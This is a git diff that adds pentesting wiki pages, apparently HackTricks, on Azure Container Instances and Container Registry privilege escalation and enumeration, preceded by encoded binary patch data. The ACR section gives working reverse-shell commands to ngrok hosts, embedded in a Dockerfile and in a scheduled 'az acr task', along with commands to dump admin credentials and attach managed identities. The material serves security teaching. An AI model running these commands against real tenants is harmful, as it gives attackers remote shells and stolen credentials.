zR4J`9p69SDPlXO8N}|Do$}$S3FbC?;-U14D$|TShlK<Xc{7gtEw32TJ-u_MKsDz7V
zvsuXO`pG|#X(GT}=+!hJXWkWch<N>LM{YbWIC@)V+V2HDWGQB$g!XA&M;K%XZ^PoZ
z?kV0xVoczHy?`P}Jh$Fpg!4%x1Yi@kLN4y}MW&xqz!6|-)3dSNIF@kvbKgA-hRs-|
z7X!-!MbCS(RL{(~wo?2tPb5+>C~0;@=aE^loh14aCgr%SJa?oeaghld%RNfq_^%~l
z-z~*A<%Ez#V&eE<9e9{ogQ%NTpBjwJ9x4Dn&(vl}E^Bc9*QTt4arINW3Jcc9Q8XsA
z4+-_}J~=o#mG40jyLOG?K8DArM<Ggo=EgsNqw<Jk_$Zr7(F6CG4_guxngKCXujN=9
z;XaBi1dt-W#{$ESwqSw-G44`Ne;$cPqR_D60*$X-)KM#ZR|<Hjf@a5m^M9gn;W!c3
zzgVRLgrFjKUy3_=D;l`qc<hbTQS7op4m?yHW5?dVZgm_k5QtXF9ECx3j6lcHhW!6@
z-2VwWE?Bd3sd}EP1#AWr<-hny(QML{YJUwd8dMj}9;gAsu8rLfE6N7jCLBPA$M>%c
zfDvwJJjvXBgU5{&L3}hyK>decUE%Tzq4SU#gQ6&If>Z~YwDU%dI6!0ESioK9bX^+Z
zf!mmjr%ds-{y`<MYrsRHZ15#EKm_b+E#EkE^`fGp!0StChCuTRB-{s^fQ{hg#o|8_
z1koYXd7B|#hzk3aLNvDT*4+YN<~}4{?k<05Fi9HEV;cH>zW+ujCAaPHe;=`UA{#XN
z@#E<bSVU~%^(Xu`%$}PIiV>$~z}T>&p`opo&$h<MK_oYAo?E~6EcGSZXn2dZNCt^%
z08HqV?;2(N&@r9*I<;x5uUvWl=JyUUL65<uSBV0%Uv=`-c~OVyW`@g-U(~qoL6`<&
zV^x#%$=|#6|Hf`}YCGS-ekTh-XHy`zyoZck!jN^w!-ZDBZh`Ez$fj58zCJxrWb6QY
zc@qPE5Kil`KPFy}4Kc+9qz?3S&2rsi@WAxX8xLhFKNr|2M8Zb!%m<=X0e6Ac?8?6>
zxc5*53bsZ;shqD0G;R3Q{L#QQN!0DkaR8B848eKA9Ch&2nE<V2JfIcS@ZQ_d%+h~V
zU3Nd^&!*!oX$VC);cbYW`{&1BzrH<CC<c~nQd;Qycs}ZCDsX8?;ojuwUEtA>vU0zM
zZ*4yK{Vr$ywpnw?Fg~TrQI@$pyRP-B@MKWiBiAu^X>%cBLA%}URe`0@nYOq%V2kEY
z(zj}6Dm7%Y0{n}G-CkA63{X+|#!}r$8UZDQ6Vk4B$};(w*!yze8NtZ;6t7Kf_3dB+
z+U%l}0LYyCX)69WP20ZpdAb$61o%a&{RIYb*mQ37*so-s)IjLFb_|=islsR9JAv0y
zW#}r=W+Ku~5LgswcTN<aI(<5O)yPo5y6;?;dQNQgIc=4wH&&Q!1DD3{K5wPc80wgA
zpe5-$H{!cWuL4-+$N2uQ44YR!zC2l5s#$IYGwZA??gRYSIRHJ8si~;4x|`KbEgG1u
zQ};>FIEmPyi9I+T^m{jj(%^a!NwpoT&9YrmR#yHscwJ;sT~aa-DdP=wvtyp6xI7+3
zYMJ|;RH(Pc)d6gdc`+H@IbnBuDq^nnUi<~EPbj4x#pEk2z!p1tphFrz+ow;T?8|9|
z?`k0=r2Dt@xE}m9n2+~MMn}=l8N084A@BJ%T2rC(Id^SSmX3_C@s;u)1GO6=3RvG{
zpzs!t_pY0QE!r}6s5yqXxVQ<hvU6ivRSu@%_*=QGa(}w`1uI%XrNA3ZV$0QAv?Uz`
zL8;R~vS*Pm03S2gr3J!(GX2YRrKWr(1`${6l$}_cCDkDyJIt!}bpewr8c|71ybMG+
zLTrm#`j1lxf|-?2@{vp4KV~Rjg*>3Xq-gdbo&lDotRVL1=TF5i>sC3Wzh7XWvjIIw
z^~s#me>>6#$L*bea3D=XLqj5#4-|MZ+LL}nP{{?@Q_YYefN&Qg>d#_1QEbX-l8;()
zwTi@Vp1QT?Pd(+eHEM2+r;Xy!$jxjU;Euk=O#JLmL<p2P@qrRpO`uf~6*~8jPAGf1
zDKI3k<XpYwY;*0nD)XYa78=>bW_Z~Rx|2`;2HW--C&)4JZ66dWUamfCM0F`B|7MNV
z!ZEY;$lc=?3`x%@Mnk<=!4@YdT$`(Lp>`hAhJp4qi&AIgD`K=y+YtkpCg{)qJ|7=F
z)|%<P2XkaG5?1VcapNKPt@85qi>x^p^c4amwPnbRAT;R;^=rqO%n?2Y`JM0b2@`g`
z%9XrEr{niUKo>=#%F<9=XvSbMD12SUKSqzNIa#m*#eg$8x_~LG^GrO5SCvWSyXrp(
z<xeaQ#Rm#9Id>K;&LZsllu8-VsEaWd{oVu%@ZugtC)*szG}xJMC^q;PK<PjtN$Z2R
z#*f^ehYYX))tuA1;Sm~PHvvc#A7R0TBlL=BFhsF9C6aCF&K-WfuLvoCqYm>BuOr&4
zW+iyGX=eAwfFtN=#T>xV?vI7SqhtwHC{pv^x!S$($b0;f2XG{kLc4iHV1|+a#1{KZ
z@e<*Y@Lhe%2@K|RN6?{O&w795$lc(-wm8h!#qjX(9J`q>9p!j_doPWhQk2rtR(eN{
zD?p*qBN&lsWrXu^FCagH3o?OiM;|u9gkVIF>>TL@6q+=G5%1gmE13NMwjgHYEwWO?
zhyr`Eu^k4c8)7FeCJq0NoU)-6a9F5kt3_QfelG)7<*{=rC~Uf1I-xq;^B15tKq^2-
z3@`NMJt?*7m2Crgj_%Ip;=KJ$ioaOhuT=g&1k3)NWkp{bu6==rK2^nfdY+rtlyCKf
zC!D=*(h|v1Y$89O`LdXdO6OGTSrQhx7pyUXYO(JV({k_USTako%ef4;?(F+K{q=fX
zr0vzxj$`|)*}V@Vp6$z9p57hHKVG#{wQqT+%wA@wh>VUlQO!{NxVhiK5MJze3>^m*
zX@fR?oEP)j43z#xQ+M&u1qV;ic`iDfPG|^hvQfo|L)b@vLS@OxE|)3MFo;Bt`PFi*
zK=5z~swCY8B?-ZZRe}Di1#nBtL4Q&&{1oL2H<mQ0??0BO^h~_3*i;T8TG3?|pWfh7
zawW~t<~$9ir8ujEngrS0J5C0MhD8w|%|S%bLUB&Z@HjR>DMVbgAG0bjw%@{rCL*`n
zHJAV|t_;ywfagA{i2w6WUv5G;&E>WI7`I^LMTkhz>#!`q*DOmGbR7a=*lo~B^a0$7
ze4?Qt-!KgEmC-^e(?&Ij7TP>Ma|0=)Jpi;so>%}D!>r{LL^@rdrk|=^21pReYNj3v
zjyUeIE2jnK8N40~C1WEQXd*@49t~qsU9|f+6uh1NVmKd>1O+<__kM0QabRzSLpvIC
zMNL}Sv1^6^D8((RJZ|-{)J2Qa492H6gQF@+!MF~BDp5R`L!&@{6kzJ?uQwSxd{#Xx
ziY3sPVVjCkv+NSkS=D?0=|_~W=o~t*80Ek$4c;SWx((4He)IOE9**MQqk+msufw!B
zT^yg3bQ{Pdhf8oajCi-(780xmy2lo#rei`87>?=*`56EGM;V_ZK_pfJktZzQ(#j@q
z;%^#ifZ~f9FgBo9PP?Qte|j7hSzcdc+$6v6^9!gbmtVU-N;w=bkO_dYLLLcUE(3w#
zK>P(`^h+6+ja$>g=|#pctpGZdEDl#-Kg1S6IEZ9nuPbhGcniYY6UPM|rtb;f7`%l0
zcTit&D?y=RY6!+YdAkQOi^{6cI!<B!zeiISy$-|Tw11}Q>KTPZvf?YztSqkIy55;K
zfO6|=Fs}ySy3M6g>SrWLm)8mAlAw_B(C|t39$7VV4vmuws=*I`-v*}6KJHloT?oPE
z=~Z=o{J8{hb67(o{Le!K(d*8UsDP}FL#H%T7t05jurGTMaUIQ@2HYZ{8Z2)-0WjV&
zT{gyn5f*z(@dp_9JQ#|X>hz?fq<P3hwGAUBMy3T(vmClksT`iI<ujrfsW6JF{Qyv9
zCCAx5_7sE5Yk|JpXo<lWtY+S?FoX{E`QSn?xyr$@2<|$&5_tDMB=WTZ^h`AEfj6kU
ze0wLKvMhaOo9)kNG}icP@bzVf>!2j@g50F!7Ah>e-_P~s%`Z+8{~i-8jI|hUgJ0ri
zJI{hdR8&-W9A&GWH&Q}aIkCA(9xYwBRFjdFEe6a`dF*^R`@%J(!M|IL{KZuzdd-N<
z;7h9Mrs4)>&t>&e9&*fsUm$7@N3T0+{~?^{JJq4j@0G(zXr%^d`4PydAuILIa=qbu
zEW85!;72GTCUgvo3v1$?_y?X$Bnn^L`p?h)+~EK27cq;wBBrOObCcd*KJY?F%P5JP
zReWO~J#vU*y&QO?$y||9l9UoOZ+iz0_iP%os4oSJ8&}w&?+4-$r3Qr+BKyUkS4KKc
z^1AOaPT3VbibEZYLx~c_qr63Z=)-%Dpx2`(s?Ht!J&K46p2hWs|L}(_Xy~P98yvL{
zbvjB9o~0LPbNEA97$9Z;+2R9@g6*dgo>hr6eE7p?44lq1j1JR3Gym^I^0V`+#O-8P
z&o;R<>ZDqUcH}qmINNloy}8=ma3Y9Mj(Uzpx$QP+XPp)^^FT-q3+`<$*v;7Z`1sE*
zcPc+)A-bB2dLjmOcd7E_r2aOwc@!PA2&Djghiz+D-$znsfou|Z=gX=om&H#T9*2Hv
z4)k3{(*bWb7by5XWDj%VD7J$7l8eCS@q2u?*orWhl?~;y8R`L@$>YTd?lmj3em%$V
zS0F&oqBWxb+kw+!exNFW!r0b}h*l;r5W_VDbjgKaFb09CzXkjGhXB`)oD9CAxhJ+y
zr;@X)HG?|Q^7*y!VmMbx>+_o+)mJ{f-76A%OsDjLKA_u{UIQh2xn(!2E=Xs+ASS-q
zDM2_GXW(rq5q$E#K!r>cqXu|QD_>Mbx!{Z<a!wuI>G*uzG|BssUSrp+HeMNDW&E?q
zM3>0jW|Lh<%tL{Lu6gox>{ZRr<EvoA9G4Y7IYK9>Bj&KxZgHflJC;+|434TOhZB)P
zCeCuaoUj2k13xG{*MF^Ak5-pagFNE~{Sy(NIz9;1PuEU_gUEF>9|T1?;I<Fv8Qwq}
zPLm3|{r&+J_&~gI4S2#$p87>bQgPuwfdSUrqtth6fJprv@Rcr><xGM9Q)r&z)tCH8
z!>d4u?(ZByx#A@WdkyJ(d}Em(EXla(xmdPYf1Ge2jJwWawj-ru^wPCuVo_8-4s<05
zeA)pFOq~Coxj2#LZbHeWR|uvPIhtbuYF?k9(WrNxY&>BN7yuk|u0oOB`@z&uCASUC
z-WP(ba4_~yzT}p{9*H=A)&Lo{EnogHWxDpD5CC1ZN45`WK6M=&it!daww7#Qk1qli
zW_acETW%eZG<%o7t5P(dymR&;%+$db*B_7EO9q=aGvxVf3SiSujJtT9ye7&G?GW=y
zY6U8I5y*-Pcz(4FrdsQRZ}cLV;_Prbk!!?G`sc`2?_?p*zC8?r7psyRYGe;M^=k(}
za$^lf<-$jG)kt!ED5d`yod-WkEhYNnFdSKu?d)u8HXmXT@t;N7EQAiWzXa%-#Fv^%
z2o95DBf9*JBP4$eR5Nk3)ECX<Q{RC_sya8cy*hPM3CJwrVNh~SxUD>fUP=t6dZEed
znhW8OO*o;X#@*!l_3K<rlu3E2D-?B%&x1L#kuwMw;yRsGITG?xbf_03{#XgW0m@9x
zf~QXe$3ZK0Y2?$BY~r6n86nUMlo)qUbn-^XNnpj$4g=7u|5iPp?<hfa1_B`1gmg}h
zZy|hR2xbt!XZ5KY)rC8Pc};MD&<OwS0mIjOn@{j?%DSdtRgO+FSSCN;!zQ4y3yT1<
ztph|VcZ;%@w9Mu+hEe2yEfwkuMrrfFL_+{1IM~}N^L(_V2lbNW+;PNKRgxhVD%aq3
zU7MNZCqm2{V;#U8jds2R=#|K$F6gpg_t>tCJuNhtSwGjJMHk<zXYRqyd@RK&%bv_A
zOMAkPrmCMJ-yulJ-C~Ffj+pArQkA|T5&Hfy$N5?iY#krBPJ8z7bYfQ8t+*YJV|x;L
zkMzAX?;HHx7$b8qzlRuvuOxs(xP~x%C+lWSd6`u&yXH7$vh*>(5vB<_-<O|*P7@Fb
zODYfV$VGp-Z&^9zi*|fugo_i!0}K)M6{oLKGq$fbG!SCq<5Qtw5F^b{9Q!oMI7Y*t
zoXZf?TK6$ous;ts3$?n|#vNg?1?zpuQ=#YOmnO?WZ?C2y)3}>o=B#>KAhh=$$$yxK
zm|nW3$Rzs0f3|2nmQ?N+b@TZ(BaB94^xk~f3Sx;bB`r>4B7L}`iyHUQyt;d7Bf5dZ
z@-rc4ZPa6_@k=l7S2lzNnpAk1wv&*Ojw-$X9{ax6pAq+zD)n6E!c&dMCkgnuHAHIm
zzT7=%P@12hQ{7L$n-CDIttg@)bH#hN^4l3Esr9xl_AE>r%A6Dp!3F6<IHZeo#q^%B
z2jz^wAsgl^`T}gwixZyzAQoi$XW|g0N(Ci{{oN7&8q+8+Vo|IM2;}<b>uHQ&8p&O_
zLJwP9T)07EA@;#<65R`hXQ>TTojue9A~v{z<r}&K_XHr!ju^~avuTHI<Ns7+F&SOc
zU!Q?fKlfyN{tJ)&X?SzAXe@eZbab@*&A`^fkEq2nVgB@vsL9PI&TjwUC8CQ6$XZwF
zBtF>Ed#(Ti+<dVAzxrL?lyNi`+2}$rQag9a6Aw-*zgpCUr>{ndnSv)IZXx=H!L@48
zZspxb5gxR9TktqXv%nTPZpmx=b4dB^K_1`-6IobTs@m{r1Uiug*q?6s$M5|;P5d%(
zYquxE5QS*acd?Wph;%0|o<hC&Brv!lBs$;uEC5{M_A4$6@tj={ywinaT#9>x>CeoM
zjd{#-wn3x>Qji>7fJz@elX91&vIl&+1#qwkZ?FG$uKw=0wakZI>{t>q05rwG;$v*C
zG8-edJqVY)7%V%&)8~S_p#hGcnrFHP@<0eUOVU7?p^^nM-WIl8&Yo9Uq0r;aRr>ih
zY?CdOU8~S=o1r2(KHlQWrMxunXl?`H7mL%=CW1ipzgm4yy$L5P4uJQ#gkB2a)i%E8
zP2eyG^JaPLfjNy8*?;!~j;A4a&|e8|f4xxL=I<JGl^f#7&HU5{=HfQP3Md<fpcC@$
zjMwG=fISBec(XPGO!a-r!M*Nd^S!g!cd9JAU&5)1ikB9apM}sB14J1HKlr$&k|Bac
zYGz_}7a$$R4lR+#25cC=>6ka1-x%kvn!J)G<F&ak*arrVl9x?j4jel+<8=99sH<;d
z{Qf}^3`4c*o$7C_o*<t_kl)MHWiWdckX81PR@IOnqVLGDJ7M3QZ(@p`E=JsD%?z+q
zn}BGB05s}}^k#s{qy2ku4^0UI4&aC_@-YS1kC16L_~cIAw};@hH{YBG%g-g+?e!IZ
z!Sqzw-mjm_!!W?cNN&*08ka%n$lFLLVRqbYDxBZxt5Ww5+&6GH^NVI5?3$c>5YHZ@
z4r5mR`HMq)K+Q7lG!h(Gx(+IakZHG6QYGxj;mHqiE6@h|DC#rX4pqD1o_TT-q^c#L
zhOg8>fD)oSp|k+~YfH7$H=~HFYcdmsU!0Q#?B8HgK~xBDfzUfGRmRT%rntNqXgEqn
zcDXU#ASJK}4k5$H<_O!E2p}99bsb;yr@wh)ke58&ggnxDX=ISM-)3X3m#coY*bW!P
zm#?w-O$WE!V{_qKyAZhaco=+}8e1Scr>YPsGr02dn8Re_{d`(XF9>ot%3M>NZTVKz
zMCa)24Tp(5jtFhn<X1s^vSSa+u{u?mN~YlJ7~kx2`LJyXMD;vt+$I0nx$7^Xv7Cq&
z=rq5{g7aNF=@B2=I65!BcF)Rd@Bu2HvXQ2LPy~Ww)CCM}F2HhrP+$+2m`4m#(wJHc
zyr38s0A0q<>x-KJ$4yR)XXf?+K9f(#M%V)Nn?*)JHBT=k*@LuxX&dweHkU^10@|Y4
zsMEUuP;Iextu#W8+>>H0m=(@V-{l6cmSr%+Yu<E@p_a?($*Ul`$K#G$&U;lwEX_Zo
zCzR)&$GX+S#3i|{oSn~7gRek#)7|?ijmbgf(|Kjno}L>U6570`bo2cM^cLc1$;H7C
zfN^X(j_vjzrUKTEZv^^|e16B+&fWZuo@nqY_#2hQBG7U0FMbd8$1)9p%&}#3K1?;x
z$ZQdWT(y!h@SsBBr+ja12*9=hbU5}B&znq%ty5JH9Hg4I&a9`w5>{jJW1>=_WcGfs
z!5kh^cg|wU%)LekP6aBVJ+~PUW;?8ZsjV`@O)PCSfrA?LSQY$`6t>#Ar6TblTw5)Z
z6-CU9G3VMnL`byN<FY(P8&8?x9nGoR$9Zj1z4H~O`66<7%ra5Lf#t79f~N2a5!zc~
zuA4t~f6qcuEBTS-n<!oNJ>WqoUUw>qnKt=r+A8;5m%!s|yy5pK_!PUviFOV5^49Y+
zYRW!v+RW^i0C&ImV9sm{#l&L8)?BtzDxV_7Y&<1s2x$Z+iZviB!=;IPQ!YUqUr259
z{8iDPt4;KyMHA~W>fiH8YemXt=R!t!)h^~edTeWXGhpvP^DyxK&_dKL=|3!VsKtj{
zvz2+yOtcY6<5zXRp#pJDDMU6gykFi(S>n-we>#QfpPfpt(i^i1^5%SA&`Z!uZ~9TK
zwAf^&42dLO+Luo_Yud{@{(<^*)(-6RuCs3AGcSERsOhpkha{fN^4d{0eEB(KERF8U
zILB%4tY^tOSEa-f=0@$CXvaP~(er&!na$j<jt$-UEOes+jr|{D02TQbedl&gM<ebB
zHD3JdDeDNW^j0%8;>+EZRLfJ(zbFO~D)*G@pU<n!G?a=er|9cMXFN@k`PpCRJ5xp&
zEBjnctG?HUdfWw7Gr1gY52^KfefJsiCm@5P74qoG<IOtOhW8bAUUS&d3L%!-^f9j6
zpE<h*&J@}rKL(zuJqH&%b;hl@>W9CKi1bUp-e<i50DYvi@*V}(r(M1~m`y7?pNFk<
z^>xJ7kernD52ZK6&L3cq{Ny-O`A+fXDyP_&_4#X-Hr8pd_7CAg6#To(dOVsRgqHOS
ze9q{YrWR+Pm56@y=uyKERnALF4XT_8DRCYbvoBU`k6&IkAFC}|DTxtNJ*~0c2T`vD
ze<{wYW%3PWXWkFz1-8}r<$sc=vf;=TWYX&xN-kQAB^Dcbe6Ub{FF)S&(vW9Yu#aa5
zYvUhSNF+MZg=@kby9TJ!?2f8m@OVSQ&Wi_HRt*VTGu^oHYNaD}6z3r+;mPo(H{03n
zG`fa{gol<<gdYjzxCK;wGnTzoMVvVEEV7nGyF1@~AmcPj^Cn6%y%t`5V5&9N`EpCp
z81I)$cn*Lrf%5Dgc#0YsinM}&h=1~YTM<3?J@>;MOS+_BUaOdEoRVpmZIH06u8YWe
zo;}t<96HVC7k_H<6kevLo_!ECe<l=|{;>5WWyWco*GFM}kc5O}<Zc;=?q<HTSP&kB
zwMI%PCJCCB)V<}PZk3-qt2Gu{X?46$4s1Puj05o+8)-^c6pIcMQ;p975nrvF8@YI}
zDUArsm9IPJgnRHglgdCW(HS@|9ij=1RNzxq1Bxp_2l4mnS-{j01y{Bn9Q^bGg0vrV
z<0Xs#V+W4;xsjnn!<sacJrB}re(_|@U6ktc)P;Xp(*IgBmpLK}?*3S#bSS^B^Vf;}
zPb-^4k4ey!q#a@Rd<g+J3#WE5AAChrBst*b+)R6dL!V9r979Va%;dd)u-P~!Qt*x(
zR!ISeKHWx%`hGdiu5j2#(I!TTwuPRa{jc`^o-M-Q&;0O}eSBc*0R5%`Ok45)x#q6W
YThj@Zy<A=0IR<~OODRg`iyQj?H}?+uMF0Q*

literal 0
HcmV?d00001

diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
new file mode 100644
index 000000000..daf64d5c9
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md
@@ -0,0 +1,76 @@
+# Az - Azure Container Instances Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Container Instances
+
+Fore more information check:
+
+{{#ref}}
+../az-services/az-container-instances.md
+{{#endref}}
+
+### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action`
+
+These permissions allow the user to **execute a command** in a running container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container.
+
+To execute a `ls` and get the output is as simple as:
+
+```bash
+az container exec --name <container-name> --resource-group <res-group>  --exec-command 'ls'
+```
+
+It's also possible to **read the output** of the container with:
+
+```bash
+az container attach --name <container-name> --resource-group <res-group>
+```
+
+Or get the logs with:
+
+```bash
+az container logs --name <container-name> --resource-group <res-group>
+```
+
+### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+These permissions allows to **attach a user managed identity** to a container group. This is very useful to escalate privileges in the container.
+
+To attach a user managed identity to a container group:
+
+```bash
+az rest \
+  --method PATCH \
+  --url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
+  --body '{
+    "identity": {
+      "type": "UserAssigned",
+      "userAssignedIdentities": {
+        "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {}
+      }
+    }
+  }' \
+  --headers "Content-Type=application/json"
+```
+
+### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+These permission allows to **create or update a container group** with a **user managed identity** attached to it. This is very useful to escalate privileges in the container.
+
+```bash
+az container create \
+  --resource-group <res-group>> \
+  --name nginx2 \
+  --image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
+  --assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \
+  --restart-policy OnFailure \
+  --os-type Linux \
+  --cpu 1 \
+  --memory 1.0
+```
+
+Moreover, it's also possible to update an existing container group adding for example the **`--command-line` argument** with a reverse shell.
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
new file mode 100644
index 000000000..8323131b5
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md
@@ -0,0 +1,143 @@
+# Az - Azure Container Registry Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Container Registry
+
+Fore more information check:
+
+{{#ref}}
+../az-services/az-container-registry.md
+{{#endref}}
+
+### `Microsoft.ContainerRegistry/registries/listCredentials/action`
+
+This permission allows the user to list the admin credentials of the ACR. This is useful to **get full access** over the registry
+
+```bash
+az rest --method POST \
+--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"
+```
+
+In case the admin credentials aren't enabled, you will also need the permission `Microsoft.ContainerRegistry/registries/write` to enable them with:
+
+```bash
+az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'
+```
+
+
+### `Microsoft.ContainerRegistry/registries/tokens/write`, `Microsoft.ContainerRegistry/registries/generateCredentials/action`
+
+These permissions allow the user to **create a new token** with passwords to access the registry.
+
+To use the `az cli`to generate it as in the following example you will also need the permissions `Microsoft.ContainerRegistry/registries/read`, `Microsoft.ContainerRegistry/registries/scopeMaps/read`, `Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read`, `Microsoft.ContainerRegistry/registries/tokens/read`
+
+```bash
+az acr token create \
+    --registry <registry-name> \
+    --name <token-name> \
+    --scope-map _repositories_admin
+```
+
+
+### `Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action`, `Microsoft.ContainerRegistry/registries/scheduleRun/action`, `Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action`
+
+These permissions allow the user to **build and run an image** in the registry. This can be used to **execute code** in the container.
+
+>[!WARNING]
+> However, the image will be executed in a **sandboxed environment** and **without access to the metadata service**. This means that the container will not have access to the **instance metadata** so this isn't really useful to escalate privileges
+
+```bash
+# Build
+echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
+az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null
+```
+
+
+### `Microsoft.ContainerRegistry/registries/tasks/write`
+
+This is the main permission that allows to create and update a task in the registry. This can be used to **execute a code inside a container with a managed identity attached to it** in the container.
+
+This is the example on how to execute a reverseh shell in a container with the **system managed** identity attached to it:
+
+```bash
+az acr task create \
+    --registry <registry-name> \
+    --name reverse-shell-task \
+    --image rev/shell:v1 \
+    --file ./Dockerfile \
+    --context https://github.com/carlospolop/Docker-rev.git \
+    --assign-identity \
+    --commit-trigger-enabled false \
+    --schedule "*/1 * * * *"
+```
+
+Another way to get a RCE from a task without using an external repository is to use the `az acr task create` command with the `--cmd` flag. This will allow you to run a command in the container. For example, you can run a reverse shell with the following command:
+
+```bash
+az acr task create \
+    --registry <registry-name> \
+    --name reverse-shell-task-cmd \
+    --image rev/shell2:v1 \
+    --cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
+    --schedule "*/1 * * * *" \
+    --context /dev/null \
+    --commit-trigger-enabled false \
+    --assign-identity
+```
+
+> [!TIP]
+> Note that to assign the system managed identity you don't need any special permission, although it must have been enabled before in the registry and assigned some permissions for it to be useful.
+
+To assign a **user managed identity also** you would need the permission `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` to do:
+
+```bash
+az acr task create \
+    --registry <registry-name> \
+    --name reverse-shell-task \
+    --image rev/shell:v1 \
+    --file ./Dockerfile \
+    --context https://github.com/carlospolop/Docker-rev.git \
+    --assign-identity \[system\] "/subscriptions/<subscription-id>>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
+    --commit-trigger-enabled false \
+    --schedule "*/1 * * * *"
+```
+
+To **update** the repo of an existent task you can do:
+
+```bash
+az acr task update \
+    --registry <registry-name> \
+    --name reverse-shell-task \
+    --context https://github.com/your-user/your-repo.git 
+```
+
+
+### `Microsoft.ContainerRegistry/registries/importImage/action`
+
+With this permission it's possible to **import an image to the azure registry**, even without having the image locally. However, note that you **cannot import an image with a tag** that already exists in the registry.
+
+```bash
+# Push with az cli
+az acr import \
+  --name <registry-name> \
+  --source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import
+```
+
+In order to **untag or delete a specific image tag** from the registry you can use the following command. However, note that you will need a user or token with **enough permissions** to do it:
+
+```bash
+az acr repository untag \
+    --name <registry-name> \
+    --image <image-name>:<tag>
+
+az acr repository delete \
+    --name <registry-name> \
+    --image <image-name>:<tag>
+```
+
+
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md
new file mode 100644
index 000000000..627ebcbf6
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md
@@ -0,0 +1,47 @@
+# Az - Container Instances
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Instances (ACI) provide a **serverless, on-demand way** to run **containers** in the Azure cloud. You can **deploy** single or multiple containers in a group with **scalable compute**, **networking options**, and the flexibility to connect to **other Azure services** (like Storage, Virtual Networks, or Container Registries). 
+
+As they are **ephemeral** workloads, you don't need to manage the underlying VM infrastructure — Azure handles that for you. However, from an **offensive security perspective**, it's crucial to understand how **permissions**, **identities**, **network configurations**, and **logs** can reveal attack surfaces and potential misconfigurations.
+
+
+### Configurations
+
+- In order to create a container it's possible to use a public image, a container image from an Azure Container Registry or an external repository, which might **require to configure a password** to access it.
+- Regarding networking it can also have a **public IP** or be **private endpoints**.
+- It's also possible to configure common docker settings like:
+    - **Environment variables**
+    - **Volumes** (even from Azure Files)
+    - **Ports**
+    - **CPU and memory limits**
+    - **Restart policy**
+    - **Run as privileged**
+    - **Command line to run**
+    - ...
+
+
+## Enumeration
+
+> [!WARNING]
+> When enumerating ACI, you can reveal sensitive configurations such as **environment variables**, **network details**, or **managed identities**. Be cautious with logging or displaying them.
+
+```bash
+# List all container instances in the subscription
+az container list
+
+# Show detailed information about a specific container instance
+az container show --name <container-name> --resource-group <res-group>
+
+# Fetch logs from a container
+az container logs --name <container-name> --resource-group <res-group>
+
+# Execute a command in a running container and get the output
+az container exec --name <container-name> --resource-group <res-group> --exec-command "ls"
+
+# Get yaml configuration of the container group
+az container export  --name <container-name> --resource-group <res-group>
+```
\ No newline at end of file
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md
new file mode 100644
index 000000000..044cfea3c
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md
@@ -0,0 +1,166 @@
+# Az - Container Registry
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Container Registry (ACR) is a secure, private registry that lets you **store, manage, and access container images in the Azure cloud**. It integrates seamlessly with several Azure services, providing automated build and deployment workflows at scale. With features like geo-replication and vulnerability scanning, ACR helps ensure enterprise-grade security and compliance for containerized applications.
+
+### Permissions
+
+These are the **different permissions** [according to the docs](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) that can be given over a Container Registry:
+
+- Access Resource Manager
+- Create/delete registry
+- Push image
+- Pull image
